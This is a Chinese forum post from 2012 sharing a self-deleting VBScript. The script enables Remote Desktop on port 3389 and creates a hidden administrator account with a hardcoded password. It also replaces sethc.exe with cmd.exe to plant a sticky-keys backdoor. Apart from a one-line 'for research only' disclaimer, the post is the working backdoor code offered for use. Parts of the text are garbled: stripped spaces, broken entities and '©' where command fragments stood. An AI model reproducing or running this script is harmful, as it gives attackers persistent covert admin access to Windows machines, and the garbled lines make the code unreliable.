可自删除开启3389创建用户粘滞键后门的vbs

显示全部楼层 · 2012-4-1 19:23:34

开启3389创建用户粘滞键后门，作研究使用，请勿违法
onerrorresumenext
constHKEY_LOCAL_MACHINE=&H80000002
strComputer="."
SetStdOut=WScript.StdOut
SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&_
strComputer&"\root\default:StdRegProv")
strKeyPath="SYSTEM\CurrentControlSet\Control\TerminalServer"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp"
strKeyPath="SYSTEM\CurrentControlSet\Control\TerminalServer"
strValueName="fDenyTSConnections"
dwValue=0
oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath="SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp"
strValueName=&quot

ortNumber"
dwValue=3389
oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath="SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp"
strValueName=&quot

ortNumber"
dwValue=3389
oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
onerrorresumenext
dimusername,password:IfWscript.Arguments.CountThen:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":endif:setwsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Setob=GetObject(os):Setoe=GetObject(os&"/Administrators,group"):Setod=ob.Create("user",username):od.SetPasswordpassword:od.SetInfo:Setof=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echoof.ADsPath
OnErrorResumeNext
Dimobj,success
Setobj=CreateObject("WScript.Shell")
success=obj.run("cmd/ctakeown/f%SystemRoot%\system32\sethc.exe&echoy|cacls%SystemRoot%\system32\sethc.exe/G%USERNAME%:F©%SystemRoot%\system32\cmd.exe%SystemRoot%\system32\acmd.exe©%SystemRoot%\system32\sethc.exe%SystemRoot%\system32\asethc.exe&del%SystemRoot%\system32\sethc.exe&ren%SystemRoot%\system32\acmd.exesethc.exe",0,True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

 
*
*